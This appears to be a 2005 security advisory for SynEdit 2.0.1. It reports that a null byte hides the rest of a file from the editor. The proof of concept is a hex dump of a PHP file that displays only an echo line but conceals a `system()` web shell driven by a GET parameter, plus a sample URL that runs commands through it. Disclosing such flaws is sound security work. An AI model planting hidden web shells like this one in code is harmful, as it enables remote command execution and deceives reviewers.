Synedit 2.0.1 has a null byte insertion / code obfuscation flaws.
db192550b50828c6a674a11b7ce0d09bcf2711b3bde09aad38aebd14ec305e52
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-number">23.47 08/08/2005
Synedit 2.0.1 (possibly prior versions) null byte insertion / code obfuscation
software description:SynEdit is an advanced multi-line edit control,
for Borland Delphi, Kylix (Kylix is supported into latest cvs) and C++Builder.
It supports Syntax Highlighting and code completion,
it does include exporters for html,tex and rtf.
exploit: a user can craft a malicious file using null byte (%00) to obfuscate
code and hide malicious instrunctions to the victim user
poc:
this an exadecimal dump of the file:
3c 3f 70 68 70 20 65 63 68 6f 20 27 68 65 6c 6c < ? p h p e c h o ' h e l l
6f 21 27 3b 00 20 73 79 73 74 65 6d 28 24 48 54 o ! ' ; s y s t e m ( $ H T
54 50 5f 47 45 54 5f 56 41 52 53 5b 63 6f 6d 6d T P _ G E T _ V A R S [ c o m m
61 6e 64 5d 29 3b 20 3f 3e a n d ] ) ; ? >
the file hides a php system shell.
Try to open it in Dev PHP, PHP Designer 2005 or other developing software using
Synedit.
It looks like this:
<?php echo 'hello!';
but when you call this url:
http://[some_host]/[path]/poc.php?command=dir
dir command will be executed...
Tested on:
Microsoft Visual C++ 6.0
Borland Delphi 7.0 Enterprise Edition
PHP Designer 2005 2.2.8
Dev-PHP Version: 2.0.12
Bloodshed Dev-Pascal 1.9.2
on Windows XP Service Pack 2
and so on...
rgod
site: http://rgod.altervista.org
mail: retrogod at aliceposta.it
</span></span>
</code></pre>